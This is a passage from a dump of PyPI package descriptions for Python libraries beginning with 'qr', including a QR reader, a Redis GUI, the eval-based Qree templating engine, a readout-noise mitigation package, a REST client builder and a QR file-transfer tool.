64x64QRpasted over a drawing.The following code will try to decode these images containingQRs withQReader,pyzbarandOpenCV.fromqreaderimportQReaderfromcv2importQRCodeDetector,imreadfrompyzbar.pyzbarimportdecode# Initialize the three tested readers (QRReader, OpenCV and pyzbar)qreader_reader,cv2_reader,pyzbar_reader=QReader(),QRCodeDetector(),decodeforimg_pathin('test_mobile.jpeg','test_draw_64x64.jpeg'):# Read the imageimg=imread(img_path)# Try to decode the QR code with the three readersqreader_out=qreader_reader.detect_and_decode(image=img)cv2_out=cv2_reader.detectAndDecode(img=img)[0]pyzbar_out=pyzbar_reader(image=img)# Read the content of the pyzbar output (double decoding will save you from a lot of wrongly decoded characters)pyzbar_out=tuple(out.data.data.decode('utf-8').encode('shift-jis').decode('utf-8')foroutinpyzbar_out)# Print the resultsprint(f\"Image:{img_path}-> QReader:{qreader_out}. OpenCV:{cv2_out}. pyzbar:{pyzbar_out}.\")The output of the previous code is:Image: test_mobile.jpeg -> QReader: ('https://github.com/Eric-Canas/QReader'). OpenCV: . pyzbar: ().\nImage: test_draw_64x64.jpeg -> QReader: ('https://github.com/Eric-Canas/QReader'). OpenCV: . pyzbar: ().Note thatQReaderinternally usespyzbarasdecoder. The improveddetection-decoding ratethatQReaderachieves comes from the combination of different image pre-processing techniques and theYOLOv8basedQRdetectorthat is able to detectQRcodes in harder conditions than classicalComputer Visionmethods.BenchmarkRotation TestMethodMax Rotation DegreesPyzbar17\u00c2\u00baOpenCV46\u00c2\u00baQReader79\u00c2\u00ba"} +{"package": "qreative", "pacakge-description": "No description available on PyPI."} +{"package": "qredis", "pacakge-description": "QRedisAPython,QtbasedRedisclient user interface.Help wantedOpen to people who want to colaborate.Would like to know which features you would like to havePull requests are welcomeYou can always open an issue saying you want to be part of the teamInstallation$pipinstallqredisRequirementsPython >= 3.5PyQt5\n(or in the future PySide)redis-pyUsage$qrediswithnoDBloadedonstartup$qredis$connecttolocalhost:6379,db=0$qredis-p6379$connectwithunixsocket,db=5$qredis-s/tmp/redis.sock-n5AlternativesRESP.app (Formerly RedisDesktopManager)dbgateRedisInsightredis-commanderAn updated list can be foundhereThat's all folks!"} +{"package": "qree", "pacakge-description": "QreeQree (read 'Curie') is a tiny but mighty Python templating engine, geared toward HTML. 'Qree' is short for:Quote,replace,exec(),eval().The entire module is under 200 lines. Instead of using regular expressions or PEGs, Qree relies on Python'sexec()andeval(). Thus, it supportsall language features, out of the box. For more on Qree's internals, please see:Build Your Own Python Template Engine!!! Warning:DoNOTrender untrusted templates. As Qree useseval(), rendering untrusted templates is equivalent to giving untrusted entities access to your entire systems.Installationpip install qreeAlternatively, just downloadqree.pyinto your project directory.Text InterpolationUse{{: expression :}}for HTML-escaped interpolation, or{{= expression =}}for interpolationwithoutescaping. The latter issusceptible to XSS, so please be careful. Here are a few quick examples:1. Hello, World!:qree.renderStr(\"

Hello, {{: data :}}\",data=\"World!\")# Output:

Hello, World!

2. Using Expressions:qree.renderStr(\"

Mr. {{: data.title() + '!' :}}\",data=\"bond\")# Output:

Mr. Bond!

3. HTML Escaping:qree.renderStr(\"Mr. {{: data :}}\",data=\" Villain \")# Output: Mr. <b> Villain </b>4. Without Escaping:qree.renderStr(\"Mr. {{= data =}}\",data=\" Villain \")# Output: Mr. Villain 5. Longer Example:qree.renderStr(\"\"\"{{: data[\"title\"].title() :}}

{{: data[\"title\"].title() :}}

{{: data[\"body\"] :}}
\"\"\",data={\"title\":\"Lorem Ipsum\",\"body\":\"Lorem ipsum dolor sit amet, ... elit.\",})# Output:Lorem Ipsum

Lorem Ipsum

Lorem ipsum dolor sit amet, ... elit.
Python CodeAny line beginning with@=is treated as Python code. (Preceding whitespace is ignored.) You can writeany codeyou wish, as Qree supports all language features. You can define variables, import modules, make assertions etc. For example:Leap Year Detection (withlambda):tplStr=\"\"\"@= isLeap = lambda n: (n % 400 == 0) or (n % 100 != 0 and n % 4 == 0)@= isOrIsNot = \"IS\" if isLeap(data['year']) else \"is NOT\"The year {{: data['year'] :}} {{: isOrIsNot :}} a leap year.\"\"\"qree.renderStr(tplStr,data={\"year\":2000})# Output: The year 2000 IS a leap year.qree.renderStr(tplStr,data={\"year\":2001})# Output: The year 2001 is NOT a leap year.Python IndentationPython is an indented language. Use the special tags@{and@}for respectively indicating indentation and de-indentation to Qree. When used, such a tagshould appear by itself on a separate line, ignoring whitespace and trailing Python comments. For example:Leap Year Detection (withdef):tplStr=\"\"\"@= def isLeap (n):@{@= if n % 400 == 0: return True;@= if n % 100 == 0: return False;@= return n % 4 == 0;@}@= isOrIsNot = \"IS\" if isLeap(data['year']) else \"is NOT\"The year {{: data['year'] :}} {{: isOrIsNot :}} a leap year.\"\"\"qree.renderStr(tplStr,data={\"year\":2000})# Output: The year 2000 IS a leap year.qree.renderStr(tplStr,data={\"year\":2001})# Output: The year 2001 is NOT a leap year.FizzBuzz ExampleFizzBuzz is a popular programming assignment. The idea is to print consecutive numbers per line, but instead to print'Fizz'for multiples of 3,'Buzz'for multiples of 5, and'FizzBuzz'for multiples of 3 and 5.qree.renderStr(\"\"\"@= for n in range(1, data+1):@{@= if n % 15 == 0:@{FizzBuzz@}@= elif n % 3 == 0:@{Fizz@}@= elif n % 5 == 0:@{Buzz@}@= else:@{{{: n :}}@}@}\"\"\",data=20)# Output:1\n 2\n Fizz\n 4\n Buzz\n Fizz\n 7\n 8\n Fizz\n Buzz\n 11\n Fizz\n 13\n 14\n FizzBuzz\n 16\n 17\n Fizz\n 19\n BuzzThedataVariableBy default, data passed via thedataparameter is available in the template as thedatavariable. However, if you'd like to change the variable name, you may do so via thevariableparameter. For example:qree.renderStr(\"Hi {{: name :}}!\",data=\"Jim\",variable=\"name\")# Output: Hi Jim!Template FilesIt's always convenient to store templates using separate files. To work with files, useqree.renderPath(tplPath, data, ...)instead ofqree.renderStr(tplStr, data, ...).Let's say you have the following directory structure:- app.py\n- qree.py\n- views/\n - homepage.htmlHere'shomepage.html:{{: data['title'] :}}

{{: data['title'] :}}

{{: data['body'] :}}
Inapp.py, you could have the following snippet:defserve_homepage():returnqree.renderPath(\"./views/homepage.html\",data={\"title\":\"The TITLE Goes Here!\",\"body\":\"And the body goes here ...\",});Which would be equivalent to:defserve_homepage():withopen(\"./views/homepage.html\",\"r\")asf:returnqree.renderStr(f.read(),data={\"title\":\"The TITLE Goes Here!\",\"body\":\"And the body goes here ...\",});In either case, the output would be:The TITLE Goes Here!

The TITLE Goes Here!

And the body goes here ...
Quick PlugQree built and maintained by the folks atPolydojo, Inc., led bySumukh Barve. If your team is looking for a simple project management tool, please check out our latest product:BoardBell.com.Template NestingSince templates can include any Python code, you can callqree.renderPath()from within a template! Consider the following directory structure:- app.py\n- qree.py\n- views/\n - header.html\n - homepage.html\n - footer.htmlWithheader.html:Link 1Link 2Link 3And similarly,footer.html:Link ALink BLink CNow, you can useheader.htmlandfooter.htmlinhomepage.html:@= import qree;\n@= import qree;{{: data['title'] :}}{{= qree.renderPath(\"./test-views/header.html\", data=None) =}}

{{: data['title'] :}}

{{: data['body'] :}}
{{= qree.renderPath(\"./test-views/footer.html\", data=None) =}}And, as before, the snippet inapp.py:defserve_homepage():returnqree.renderPath(\"./views/homepage.html\",data={\"title\":\"The TITLE Goes Here!\",\"body\":\"And the body goes here ...\",});The output is:... TITLE 2 ...Link 1Link 2Link 3

... TITLE 2 ...

... BODY 2 ...
Link ALink BLink CIn the above example, we explicitly passeddata=Noneto each nested template. We could've passed any value. We could've even ignored thedataparameter, as it defaults toNoneanyway.Custom Tags (viatagMap)Default tags like{{:,:}},@=, etc. can each be customized via thetagMapparameter. UsingtagMap, just supply your desired tag as the value against the default tag as key. A few examples follow:1.[[:Square:]]Brackets Instead Of{{:Braces:}}qree.renderStr(tplStr=\"Hello, [[: data.title().rstrip('!') + '!' :]]\",data=\"world\",tagMap={\"{{:\":\"[[:\",\":}}\":\":]]\",\"{{=\":\"[[=\",# <-- Not directly used in this example.\"=}}\":\"=]]\",# <---^})# Output: Hello, World!2. Percentage Sign For Code Blocks (%vs@)tplStr=\"\"\"%= isLeap = lambda n: (n % 400 == 0) or (n % 100 != 0 and n % 4 == 0)%= isOrIsNot = \"IS\" if isLeap(data['year']) else \"is NOT\"The year {{: data['year'] :}} {{: isOrIsNot :}} a leap year.\"\"\"qree.renderStr(tplStr,data={\"year\":2020},tagMap={\"@=\":\"%=\",\"@{\":\"%{\",# <-- Not directly used in this example.\"@}\":\"%}\",# <--^})# Output: The year 2020 IS a leap year.DefaulttagMap:The default values for each of the tags is as specified in the dict below.{\"@=\":\"@=\",\"@{\":\"@{\",\"@}\":\"@}\",\"{{=\":\"{{=\",\"=}}\":\"=}}\",\"{{:\":\"{{:\",\":}}\":\":}}\",}View DecoratorIf you're working withFlask,Bottleor a similar WSGI framework,qree.viewcan help bind route to templates.@app.route(\"/user-list\")@qree.view(\"./views/user-list.html\",variable=\"userList\")defserve_userList():userList=yourLogicHere();returnuserList;The above is identical to the following:@app.route(\"/user-list\")defserve_user_list_page():userList=yourLogicHere();returnqree.renderPath(\"./views/user-list.html\",data=userList,variable=\"userList\",);Vilo:UsingViloinstead of Flask/Bottle? Great choice! Qree jives with Vilo:@app.route(\"GET\",\"/user-list\")@qree.view(\"./views/user-list.html\",variable=\"userList\")defserve_userList(req,res):userList=yourLogicHere(req);returnuserList;Custom Tags:Like withqree.renderPath(.)andqree.renderStr(.), you can use custom tags withqree.view(.)by passingtagMap.Testing & ContributingInstall pytest viapip install -U pytest. Run tests with:pytestIf you encounter a bug, please open an issue on GitHub; but if you find a security vulnerability, please emailsecurity@polydojo.cominstead.If you'd like to see a new feature or contribute code, please open a GitHub issue. We'd love to hear from you! Suggestions and code contributions will always be appreciated, big and small.LicensingCopyright (c) 2020 Polydojo, Inc.Software Licensing:The software is released \"AS IS\" under theMIT license, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED. Kindly seeLICENSE.txtfor more details.No Trademark Rights:The above software licensing termsdo notgrant any right in the trademarks, service marks, brand names or logos of Polydojo, Inc."} +{"package": "qreg", "pacakge-description": "UNKNOWN"} +{"package": "qregpy", "pacakge-description": "TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION1. Definitions.\"License\" shall mean the terms and conditions for use, reproduction,and distribution as defined by Sections 1 through 9 of this document.\"Licensor\" shall mean the copyright owner or entity authorized bythe copyright owner that is granting the License.\"Legal Entity\" shall mean the union of the acting entity and allother entities that control, are controlled by, or are under commoncontrol with that entity. For the purposes of this definition,\"control\" means (i) the power, direct or indirect, to cause thedirection or management of such entity, whether by contract orotherwise, or (ii) ownership of fifty percent (50%) or more of theoutstanding shares, or (iii) beneficial ownership of such entity.\"You\" (or \"Your\") shall mean an individual or Legal Entityexercising permissions granted by this License.\"Source\" form shall mean the preferred form for making modifications,including but not limited to software source code, documentationsource, and configuration files.\"Object\" form shall mean any form resulting from mechanicaltransformation or translation of a Source form, including butnot limited to compiled object code, generated documentation,and conversions to other media types.\"Work\" shall mean the work of authorship, whether in Source orObject form, made available under the License, as indicated by acopyright notice that is included in or attached to the work(an example is provided in the Appendix below).\"Derivative Works\" shall mean any work, whether in Source or Objectform, that is based on (or derived from) the Work and for which theeditorial revisions, annotations, elaborations, or other modificationsrepresent, as a whole, an original work of authorship. For the purposesof this License, Derivative Works shall not include works that remainseparable from, or merely link (or bind by name) to the interfaces of,the Work and Derivative Works thereof.\"Contribution\" shall mean any work of authorship, includingthe original version of the Work and any modifications or additionsto that Work or Derivative Works thereof, that is intentionallysubmitted to Licensor for inclusion in the Work by the copyright owneror by an individual or Legal Entity authorized to submit on behalf ofthe copyright owner. For the purposes of this definition, \"submitted\"means any form of electronic, verbal, or written communication sentto the Licensor or its representatives, including but not limited tocommunication on electronic mailing lists, source code control systems,and issue tracking systems that are managed by, or on behalf of, theLicensor for the purpose of discussing and improving the Work, butexcluding communication that is conspicuously marked or otherwisedesignated in writing by the copyright owner as \"Not a Contribution.\"\"Contributor\" shall mean Licensor and any individual or Legal Entityon behalf of whom a Contribution has been received by Licensor andsubsequently incorporated within the Work.2. Grant of Copyright License. Subject to the terms and conditions ofthis License, each Contributor hereby grants to You a perpetual,worldwide, non-exclusive, no-charge, royalty-free, irrevocablecopyright license to reproduce, prepare Derivative Works of,publicly display, publicly perform, sublicense, and distribute theWork and such Derivative Works in Source or Object form.3. Grant of Patent License. Subject to the terms and conditions ofthis License, each Contributor hereby grants to You a perpetual,worldwide, non-exclusive, no-charge, royalty-free, irrevocable(except as stated in this section) patent license to make, have made,use, offer to sell, sell, import, and otherwise transfer the Work,where such license applies only to those patent claims licensableby such Contributor that are necessarily infringed by theirContribution(s) alone or by combination of their Contribution(s)with the Work to which such Contribution(s) was submitted. If Youinstitute patent litigation against any entity (including across-claim or counterclaim in a lawsuit) alleging that the Workor a Contribution incorporated within the Work constitutes director contributory patent infringement, then any patent licensesgranted to You under this License for that Work shall terminateas of the date such litigation is filed.4. Redistribution. You may reproduce and distribute copies of theWork or Derivative Works thereof in any medium, with or withoutmodifications, and in Source or Object form, provided that Youmeet the following conditions:(a) You must give any other recipients of the Work orDerivative Works a copy of this License; and(b) You must cause any modified files to carry prominent noticesstating that You changed the files; and(c) You must retain, in the Source form of any Derivative Worksthat You distribute, all copyright, patent, trademark, andattribution notices from the Source form of the Work,excluding those notices that do not pertain to any part ofthe Derivative Works; and(d) If the Work includes a \"NOTICE\" text file as part of itsdistribution, then any Derivative Works that You distribute mustinclude a readable copy of the attribution notices containedwithin such NOTICE file, excluding those notices that do notpertain to any part of the Derivative Works, in at least oneof the following places: within a NOTICE text file distributedas part of the Derivative Works; within the Source form ordocumentation, if provided along with the Derivative Works; or,within a display generated by the Derivative Works, if andwherever such third-party notices normally appear. The contentsof the NOTICE file are for informational purposes only anddo not modify the License. You may add Your own attributionnotices within Derivative Works that You distribute, alongsideor as an addendum to the NOTICE text from the Work, providedthat such additional attribution notices cannot be construedas modifying the License.You may add Your own copyright statement to Your modifications andmay provide additional or different license terms and conditionsfor use, reproduction, or distribution of Your modifications, orfor any such Derivative Works as a whole, provided Your use,reproduction, and distribution of the Work otherwise complies withthe conditions stated in this License.5. Submission of Contributions. Unless You explicitly state otherwise,any Contribution intentionally submitted for inclusion in the Workby You to the Licensor shall be under the terms and conditions ofthis License, without any additional terms or conditions.Notwithstanding the above, nothing herein shall supersede or modifythe terms of any separate license agreement you may have executedwith Licensor regarding such Contributions.6. Trademarks. This License does not grant permission to use the tradenames, trademarks, service marks, or product names of the Licensor,except as required for reasonable and customary use in describing theorigin of the Work and reproducing the content of the NOTICE file.7. Disclaimer of Warranty. Unless required by applicable law oragreed to in writing, Licensor provides the Work (and eachContributor provides its Contributions) on an \"AS IS\" BASIS,WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express orimplied, including, without limitation, any warranties or conditionsof TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR APARTICULAR PURPOSE. You are solely responsible for determining theappropriateness of using or redistributing the Work and assume anyrisks associated with Your exercise of permissions under this License.8. Limitation of Liability. In no event and under no legal theory,whether in tort (including negligence), contract, or otherwise,unless required by applicable law (such as deliberate and grosslynegligent acts) or agreed to in writing, shall any Contributor beliable to You for damages, including any direct, indirect, special,incidental, or consequential damages of any character arising as aresult of this License or out of the use or inability to use theWork (including but not limited to damages for loss of goodwill,work stoppage, computer failure or malfunction, or any and allother commercial damages or losses), even if such Contributorhas been advised of the possibility of such damages.9. Accepting Warranty or Additional Liability. While redistributingthe Work or Derivative Works thereof, You may choose to offer,and charge a fee for, acceptance of support, warranty, indemnity,or other liability obligations and/or rights consistent with thisLicense. However, in accepting such obligations, You may act onlyon Your own behalf and on Your sole responsibility, not on behalfof any other Contributor, and only if You agree to indemnify,defend, and hold each Contributor harmless for any liabilityincurred by, or claims asserted against, such Contributor by reasonof your accepting any such warranty or additional liability.END OF TERMS AND CONDITIONSAPPENDIX: How to apply the Apache License to your work.To apply the Apache License to your work, attach the followingboilerplate notice, with the fields enclosed by brackets \"[]\"replaced with your own identifying information. (Don't includethe brackets!) The text should be enclosed in the appropriatecomment syntax for the file format. We also recommend that afile or class name and description of purpose be included on thesame \"printed page\" as the copyright notice for easieridentification within third-party archives.Copyright [2019] [Qingzhi Ma]Licensed under the Apache License, Version 2.0 (the \"License\");you may not use this file except in compliance with the License.You may obtain a copy of the License athttp://www.apache.org/licenses/LICENSE-2.0Unless required by applicable law or agreed to in writing, softwaredistributed under the License is distributed on an \"AS IS\" BASIS,WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.See the License for the specific language governing permissions andlimitations under the License.Description:This project implements the Query-Centric Regression, named QReg.QReg is a ensemble methods based on various base regression models.Current QReg support linear, polynomial, decision tree, xgboost, gboosting regression as its base models.DependenciesPython 3.6 or higher, requires scipy, xgboost, numpy, scikit-learnKeywords: Query-centric RegressionPlatform: UNKNOWNClassifier: Development Status :: 1.1Classifier: License :: OSI Approved :: MIT LicenseClassifier: Programming Language :: Python :: 3.6Classifier: Topic :: Approximate Query Processing :: Regression :: ensemble method"} +{"package": "qrem", "pacakge-description": "QREM - Quantum Readout Errors MitigationThis package provides a versatile set of tools for the characterization and mitigation of readout noise in NISQ devices. Standard characterization approaches become infeasible with the growing size of a device, since the number of circuits required to perform tomographic reconstruction of a measurement process grows exponentially in the number of qubits. In QREM we use efficient techniques that circumvent those problems by focusing on reconstructing local properties of the readout noise.You can find article based on initial version of this packagehere - http://arxiv.org/abs/2311.10661and the corresponding code used at the moment of writning the articlehere.Status of developmentThis package is released now as an alpha version, to gather feedback while it undergoes final adjustments prior to the first release. As it is under heavy development, existing functionalities might change, while new functionalities and notebooks are expected to be added in the future.DocumentationCurrent documentation (work in progress) is availablehereIntroductionThe two current main functionalities are:Noise characterizationexperiment designhardware experiment implementation and data processing (on devices supported by qiskit/pyquil)readout noise characterisationlearning of noise modelsNoise mitigationmitigation based on noise model provided by user ( currently available is CN, CTMP is under development)InstallationThe best way to install this package is to use pip (seepypi website):pip install qremThis method will automatically install all required dependecies (seebelow for list of dependecies).DependenciesForqrempackage to work properly, the following libraries should be present (and will install if you install via pip):\"numpy >= 1.18.0, < 1.24\",\"scipy >= 1.7.0\",\"tqdm >= 4.46.0\",\"colorama >= 0.4.3\",\"qiskit >= 0.39.4\",\"networkx >= 0.12.0, < 3.0\",\"pandas >= 1.5.0\",\"picos >= 2.4.0\",\"qiskit-braket-provider >= 0.0.3\",\"qutip >= 4.7.1\",\"matplotlib >= 3.6.0\",\"seaborn >= 0.12.0\",\"sympy >= 1.11.0\",\"pyquil >= 3.0.0\",\"pyquil-for-azure-quantum\",\"ipykernel >= 6.1.0\",\"configargparse >= 1.5.0\",\"python-dotenv >= 1.0.0\",Optional dependenciesDependecies for visualizations:\"manim >= 0.17.2\"ReferencesThe workflow of this package is mainly based on works:[1] Filip B. Maciejewski, Zolt\u00e1n Zimbor\u00e1s, Micha\u0142 Oszmaniec, \"Mitigation of readout noise in near-term quantum devices by classical post-processing based on detector tomography\",Quantum 4, 257 (2020)[2] Filip B. Maciejewski, Flavio Baccari, Zolt\u00e1n Zimbor\u00e1s, Micha\u0142 Oszmaniec, \"Modeling and mitigation of cross-talk effects in readout noise with applications to the Quantum Approximate Optimization Algorithm\",Quantum 5, 464 (2021)Further references:[3]. Sergey Bravyi, Sarah Sheldon, Abhinav Kandala, David C. Mckay, Jay M. Gambetta, Mitigating measurement errors in multi-qubit experiments,Phys. Rev. A 103, 042605 (2021)[4]. Flavio Baccari, Christian Gogolin, Peter Wittek, and Antonio Ac\u00edn, Verifying the output of quantum optimizers with ground-state energy lower bounds,Phys. Rev. Research 2, 043163 (2020)"} +{"package": "qrencode", "pacakge-description": "A simple wrapper for the C qrencode library."} +{"package": "qrencode-ascii", "pacakge-description": "# pyqrencode\nPython wrapper for C qrencode library.### Usage`bash $ python3-c'import qrencode_ascii;print(qrencode_ascii.encode(\\'HelloWorld\\'))'\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588 \u2580 \u2584\u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588 \u2588\u2588 \u2588 \u2588 \u2588\u2584 \u2588 \u2584\u2588 \u2588 \u2588 \u2588\u2588 \u2588\u2588\u2588\u2584\u2584\u2584\u2588\u2588\u2588\u2588\u2584\u2588\u2588\u2588\u2584\u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2588\u2580\u2584\u2580\u2588\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2588\u2588\u2588\u2588\u2584 \u2588 \u2584\u2584 \u2584\u2588\u2584\u2580\u2580\u2588\u2584\u2580\u2580\u2588\u2588\u2588\u2588\u2584\u2588\u2588\u2584\u2588\u2584\u2588\u2580\u2588\u2584\u2584\u2588\u2584\u2584\u2584 \u2584\u2588\u2588\u2588\u2588\u2584\u2584\u2588\u2588\u2584\u2588\u2584\u2584\u2580\u2584\u2580\u2580\u2584\u2588\u2584\u2584\u2588\u2580\u2580\u2588\u2588\u2588\u2588\u2588\u2584\u2584\u2584\u2584\u2584\u2588 \u2580\u2584 \u2580\u2588\u2588\u2584\u2588\u2584\u2584\u2588\u2588 \u2588\u2588 \u2588 \u2588\u2588\u2584\u2580\u2580\u2588\u2588\u2580\u2580\u2588\u2580\u2580\u2588\u2588\u2588\u2588\u2588\u2588\u2584\u2584\u2584\u2588\u2588\u2588\u2584\u2580\u2584\u2588\u2584\u2588\u2588\u2584\u2580\u2584\u2588\u2588\u2588\u2588\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2588\u2584\u2588\u2584\u2584\u2584\u2588\u2588\u2584\u2588\u2588\u2588\u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588`"} +{"package": "qrep", "pacakge-description": "No description available on PyPI."} +{"package": "qreport", "pacakge-description": "No description available on PyPI."} +{"package": "qrequest", "pacakge-description": "qrequest========Instantly create an API and web interface for SQL queries.# Basic Setup1. Write SQL queries to collect the data users can access. Use :keywords for parameters.2. Run `python qrequest.py setup` to get an sql folder to put your queries and default settings file2. Put these queries in the sql/main directory3. Modify the settings below to specify the database driver (name of the python module) and databsae connection string4. Then run `python qrequest.py run` to get a website which lets users run any of your queries without installing a thing, as well as an API endpoint.The settings file looks like this. You can change the website title, description and the port the site runs on```{\"sites\": {\"main\": {\"db_connection_string\": \"\",\"db_driver\": \"\"}},\"website_description\": \"Run some queries\",\"website_port_number\": 5000,\"website_title\": \"qRequest\"}```Users can view queries through the web interface, and download the json or csv formatted query results.The URL format for the json endpoint is```/api/{site_name}/{query_name}.json?{params}```The URL format for the CSV endpoint is```/api/{site_name}/{query_name}.csv?{params}```As an example, if you have a query called example_query.sql with two parameters (param1 and param2),to run the query with param1=1234 and param2=\"string\", go to```/api/main/example_query.sql.csv?param1=1234¶m2=string```# Multiple Sitesqrequest supports multiple database connections, which are called sites.To setup qrequest for multiple sites, pass all the site names as arguments to the`setup` command. If none are passed, one site called `main` is created by default.As an example, to setup two sites called `site1` and `site2` run```python qrequest.py setup site1 site2```This will generate the following settings file```{\"sites\": {\"site1\": {\"db_connection_string\": \"\",\"db_driver\": \"\"},\"site2\": {\"db_connection_string\": \"\",\"db_driver\": \"\"}},\"website_description\": \"Run some queries\",\"website_port_number\": 5000,\"website_title\": \"qRequest\"}```You can specify different connection strings and database drivers for each site."} +{"package": "qreservoir", "pacakge-description": "QreservoirQreservoir is a lightweight python package built on top of qulacs to simulate quantum extreme learning and quantum reservoir computing models.Qreservoir is licensed under theMIT license.Tutorial and API documentsDocumentation and API:https://owenagnel.github.io/qreservoir.Quick Install for Pythonpip install qreservoirUninstall Qreservoir:pip uninstall qreservoirFeaturesFast simulation of quantum extreme learning machine and quantum reservoir computing.Python sample codefromqulacsimportObservablefromsklearn.linear_modelimportLinearRegressionfromqreservoir.datasetsimportComplex_Fourrierfromqreservoir.encodersimportExpEncoderfromqreservoir.modelsimportQELModelfromqreservoir.reservoirsimportRotationReservoirdataset=Complex_Fourrier(complexity=1,size=1000,noise=0.0)encoder=ExpEncoder(1,1,3)# 1 feature, 1 layer, 1 qubit per featurereservoir=RotationReservoir(encoder,0,10)# 0 ancilla qubits, 10 depthobservables=[Observable(3)for_inrange(9)]# create observable setfori,obinenumerate(observables[:3]):ob.add_operator(1.0,f\"X{i}\")fori,obinenumerate(observables[3:6]):ob.add_operator(1.0,f\"Z{i}\")fori,obinenumerate(observables[6:]):ob.add_operator(1.0,f\"Y{i}\")model=QELModel(reservoir,observables,LinearRegression())# observable is a qulacs Observable objectX,_,y,_=dataset.get_train_test()model.fit(X,y)print(model.score(X,y))How to citeN/AFuture improvementsModel creation currently a bit clunky. Models should take encoders and reservoirs as two seperate arguments and size of inputs should be determined dynamically when fit/score are called. This is made more difficult by the fact we wish to extract variance and concentration data from the models. Ideally we wantRCModelandQELModelto implement scikit-learn'sBaseEstimatorinterface.Additional tests should be written for datasets and new reservoirs/encodersImprove package structure by using python specific object oriented features."} +{"package": "qresp", "pacakge-description": "No description available on PyPI."} +{"package": "qresp-config", "pacakge-description": "No description available on PyPI."} +{"package": "qrest", "pacakge-description": "qrest is a Python package that allows you to easily build a Python client to\naccess a REST API. To show how it works, we use it to access the REST API of theJSONPlaceholder website, which provides dummy data for testing and\nprototyping purposes.The following Python snippet sends a HTTP GET request to retrieve all \u201cposts\u201d,\nwhich is one of the resources of the website:import pprint\nimport requests\n\nresponse = requests.request(\"GET\", \"https://jsonplaceholder.typicode.com/posts\")\npprint.pprint(response.json()[0:2])This snippet outputs:[{'body': 'quia et suscipit\\n'\n 'suscipit recusandae consequuntur expedita et cum\\n'\n 'reprehenderit molestiae ut ut quas totam\\n'\n 'nostrum rerum est autem sunt rem eveniet architecto',\n 'id': 1,\n 'title': 'sunt aut facere repellat provident occaecati excepturi optio '\n 'reprehenderit',\n 'userId': 1},\n{'body': 'est rerum tempore vitae\\n'\n 'sequi sint nihil reprehenderit dolor beatae ea dolores neque\\n'\n 'fugiat blanditiis voluptate porro vel nihil molestiae ut '\n 'reiciendis\\n'\n 'qui aperiam non debitis possimus qui neque nisi nulla',\n 'id': 2,\n 'title': 'qui est esse',\n 'userId': 1}]The snippet uses the Pythonrequestslibrary to send the request. This library\nmakes it very easy to query a REST API, but it requires the user to know the\nstructure of the REST API, how to build calls to that API, how to parse\nresponses etc. This is where qrest comes in: it allows you toconfigurea\nPython API that provides access to theinformationand hides the nitty-gritty\ndetails of writing REST API code. For example, using qrest the code to retrieve\nthe posts looks like this:import qrest\nimport jsonplaceholderconfig\n\napi = qrest.API(jsonplaceholderconfig)\n\nposts = api.all_posts()If you want to retrieve the posts from a specific author:import pprint\n\n# all authors are numbered from 1 to 10\nposts = api.filter_posts(user_id=7)\n\n# only output the title of each post for brevity\ntitles = [post[\"title\"] for post in posts]\npprint.pprint(titles)which outputs:['voluptatem doloribus consectetur est ut ducimus',\n 'beatae enim quia vel',\n 'voluptas blanditiis repellendus animi ducimus error sapiente et suscipit',\n 'et fugit quas eum in in aperiam quod',\n 'consequatur id enim sunt et et',\n 'repudiandae ea animi iusto',\n 'aliquid eos sed fuga est maxime repellendus',\n 'odio quis facere architecto reiciendis optio',\n 'fugiat quod pariatur odit minima',\n 'voluptatem laborum magni']The one thing you have to do is configure this API. The modulejsonplaceholderconfigin the example above is configured like this:from qrest import APIConfig, ResourceConfig, QueryParameter\n\n\nclass JSONPlaceholderConfig(APIConfig):\n url = \"https://jsonplaceholder.typicode.com\"\n\n\nclass AllPosts(ResourceConfig):\n\n name = \"all_posts\"\n path = [\"posts\"]\n method = \"GET\"\n description = \"retrieve all posts\"\n\n\nclass FilterPosts(ResourceConfig):\n\n name = \"filter_posts\"\n path = [\"posts\"]\n method = \"GET\"\n description = \"retrieve all posts with a given title\"\n\n user_id = QueryParameter(name=\"userId\", description=\"the user ID of the author of the post\")For more information about qrest and its usage, we refer to the documentation.If you want to contribute to qrest itself, we refer to the developer README that\nis located in the root directory of the repo."} +{"package": "qreu", "pacakge-description": "EMail Wrapper"} +{"package": "qr-fileautomator", "pacakge-description": "File OrganizerOrganizes your files in the folder according to their extension by grouping them together.Libraries UsedUsageJust run the commandpython3 fileorganizerpyfrom your terminal/bash."} +{"package": "qr-filetransfer", "pacakge-description": "\u2728Transfer files over WiFi between your computer and your smartphone from the terminal\u2728InstallationYou will find the most updated version ofqr-filetransferhere. But if you want the most stable version, usepipto install itPip InstallGlobal Installpip3 install qr-filetransfer[extras]Local Installpip3 install --user qr-filetransfer[extras]If you run into problems during the install, try removing the optional[extras]at the end of the command.Git Install# clone the repo$gitclonehttps://github.com/sdushantha/qr-filetransfer.git# change the working directory to qr-filetransfer$cdqr-filetransfer# install the requirements$pip3install-rrequirements.txtUsageusage: qr-filetransfer [-h] [--debug] [--receive] [--port PORT]\n [--ip_addr {192.168.0.105}] [--auth AUTH]\n file_path\n\nTransfer files over WiFi between your computer and your smartphone from the\nterminal\n\npositional arguments:\n file_path path that you want to transfer or store the received\n file.\n\noptional arguments:\n -h, --help show this help message and exit\n --debug, -d show the encoded url.\n --receive, -r enable upload mode, received file will be stored at\n given path.\n --port PORT, -p PORT use a custom port\n --ip_addr {192.168.0.105}\n specify IP address\n --auth AUTH add authentication, format: username:passwordNote:Both devices needs to be connected to the same networkExitingTo exit the program, just pressCTRL+C.Transfer a single 